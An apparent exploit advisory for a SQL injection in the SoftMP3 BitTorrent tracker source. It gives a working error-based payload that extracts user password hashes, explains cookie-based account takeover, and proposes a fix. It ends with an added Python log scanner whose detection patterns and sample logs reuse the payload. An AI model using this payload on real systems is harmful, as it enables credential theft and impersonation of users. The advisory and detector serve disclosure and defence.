# Exploit Title: SOFTMP3 source code SQL injection
# Date: 23/04/2011
# Author: mArTi
# Software Link: http://softmp3.org/
# Version: No other versions available...
# Tested on: Windows / Unix

/.................................../
Introduction
/.................................../

SoftMP3 released the source code of its BitTorrent tracker when it shut down. This source code is vulnerable to a SQL injection. Here's the PoC and the fix.

/.................................../
PoC
/.................................../

-> SQL

http://localhost/SOFTMP3/minbrowse.php?search=string' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,users.id,0x27,users.username,0x27,users.passhash,0x27,0x7e) FROM `database`.users where id=1 LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

-----> Then you can use this to connect as the user you want with the passhash you got, by setting the following cookies:

uid=id
pass=encrypted passhash (see below)

---------> getting encrypted passhash to connect with the cookies

/.................................../
FIX
/.................................../

Delete /minbrowse.php (useless).

BTW, if you want to protect the cookies, just change the cookie encryption in the bittorent.php file (like the "hejsan" key or the order of terms in the encryption).

--------------------------------------------------------
--------------------------------------------------------

Close the security holes in your site to protect your users and your site.
If you want to contact me, you'll know where to find me.

--------------------------------------------------------
--------------------------------------------------------
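Until minbrowse.php is removed, the probe above leaves a recognisable trace in the web server's access log: a quote breaking out of the `search` string, `floor(rand(0)*2)` with `group by` (the MySQL duplicate-key error-extraction idiom) and reads from `information_schema`. The script below is an added example for this advisory, not code from the advisory or from SoftMP3; it assumes Apache/nginx common-format access logs, and the log lines it scans are constructed (the third one carries the advisory's own payload, percent-encoded as a client would send it).

```python
"""Flag error-based SQL injection probes (the shape of the minbrowse.php
payload in the advisory) in web-server access logs.

Added example; not part of the advisory or of the SoftMP3 code.  Assumes
common/combined access-log format; the sample lines below are constructed.
"""
import re
from urllib.parse import parse_qsl, quote, unquote_plus, urlsplit

# Signatures distilled from the advisory's payload: a quote that closes the
# string literal followed by a boolean operator, and the MySQL duplicate-key
# error-extraction idiom (count(*) ... floor(rand(0)*2) ... group by)
# reading from information_schema.  union/select is added for completeness.
SIGNATURES = {
    "quote_then_operator": re.compile(r"'\s*(?:and|or)\b", re.I),
    "floor_rand_trick": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}

# Common-log prefix: client identd user [time] "METHOD URL PROTO" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)


def decoded_params(url):
    """Split the query string and percent-decode each value twice, so a
    double-encoded probe (%2527 for the quote) is inspected in clear."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)   # first decode
    return parts.path, [(k, unquote_plus(v)) for k, v in pairs]  # second


def scan_line(line):
    """Return a finding dict for one log line, or None if it looks clean."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path, params = decoded_params(m.group("url"))
    hits = sorted({(k, name) for k, v in params
                   for name, rx in SIGNATURES.items() if rx.search(v)})
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
            "status": m.group("status"), "hits": hits}


def scan_log(lines):
    """Scan an iterable of log lines; return only the lines with findings."""
    return [f for f in map(scan_line, lines) if f]


# --- constructed sample log (not real traffic) ---------------------------
# The advisory's payload, percent-encoded the way a browser or tool sends it.
_PAYLOAD = ("string' and(select 1 from(select count(*),concat((select (select "
            "(SELECT concat(0x7e,0x27,users.id,0x27,users.username,0x27,"
            "users.passhash,0x27,0x7e) FROM `database`.users where id=1 "
            "LIMIT 0,1) ) from information_schema.tables limit 0,1),"
            "floor(rand(0)*2))x from information_schema.tables group by x)a) "
            "and '1'='1")

SAMPLE_LOG = [
    '198.51.100.4 - - [23/Apr/2011:14:01:58 +0200] '
    '"GET /SOFTMP3/minbrowse.php?search=linux+iso HTTP/1.1" 200 8842',
    # a legitimate search containing the word "and" must not fire
    '198.51.100.9 - - [23/Apr/2011:14:02:03 +0200] '
    '"GET /SOFTMP3/minbrowse.php?search=rock+and+roll HTTP/1.1" 200 7310',
    '203.0.113.7 - - [23/Apr/2011:14:02:11 +0200] '
    '"GET /SOFTMP3/minbrowse.php?search=' + quote(_PAYLOAD)
    + ' HTTP/1.1" 200 5123',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["path"],
              [name for _, name in finding["hits"]])
```

Run against real logs with `scan_log(open("access.log"))`; a finding that carries several of these signatures on one request is a strong indicator, while a single `quote_then_operator` hit on its own can be a benign search string containing an apostrophe and deserves a look rather than an automatic block.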